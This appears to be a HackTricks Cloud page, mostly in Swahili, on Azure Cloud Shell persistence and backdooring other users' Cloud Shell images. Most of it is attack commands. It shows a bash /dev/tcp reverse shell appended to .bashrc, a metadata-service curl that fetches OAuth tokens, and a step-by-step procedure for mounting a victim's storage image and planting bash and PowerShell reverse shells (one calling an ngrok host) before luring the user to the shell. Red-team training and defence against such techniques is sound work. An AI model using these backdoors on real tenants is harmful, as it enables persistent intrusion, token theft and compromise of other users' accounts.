HackTricks CloudAz - Cloud Shell Persistence
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Cloud Shell Persistence
Azure Cloud Shell inatoa ufikiaji wa amri ili kudhibiti rasilimali za Azure kwa kuhifadhi kudumu na uthibitishaji wa kiotomatiki. Washambuliaji wanaweza kutumia hii kwa kuweka milango ya nyuma katika saraka ya nyumbani ya kudumu:
- Persistent Storage: Saraka ya nyumbani ya Azure Cloud Shell imewekwa kwenye sehemu ya faili ya Azure na inabaki salama hata baada ya kikao kumalizika.
- Startup Scripts: Faili kama
.bashrcauconfig/PowerShell/Microsoft.PowerShell_profile.ps1zinafanya kazi kiotomatiki mwanzoni mwa kila kikao, kuruhusu utekelezaji wa kudumu wakati shell ya wingu inaanza.
Mfano wa milango ya nyuma katika .bashrc:
echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
Hii backdoor inaweza kutekeleza amri hata dakika 5 baada ya shell ya wingu kumalizika na mtumiaji.
Zaidi ya hayo, uliza huduma ya metadata ya Azure kwa maelezo ya mfano na tokeni:
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
Cloud Shell Phishing
Ikiwa mshambuliaji atapata picha za watumiaji wengine katika Akaunti ya Hifadhi ambayo ana ruhusa ya kuandika na kusoma, ataweza kupakua picha hiyo, kuongeza backdoor ya bash na PS ndani yake, na kuipakia tena kwenye Akaunti ya Hifadhi ili wakati mtumiaji atakapofikia shell, amri zitatekelezwa kiotomatiki.
- Pakua, backdoor na upakia picha:
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s <file-share>
# Mount the image
mkdir /tmp/backdoor_img
sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
cd /tmp/backdoor_img
# Create backdoor
mkdir .config
mkdir .config/PowerShell
touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Bash backdoor
echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
# PS backdoor
echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Unmount
cd /tmp
sudo umount /tmp/backdoor_img
# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
- Kisha, mwongoze mtumiaji kufikia https://shell.azure.com/
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.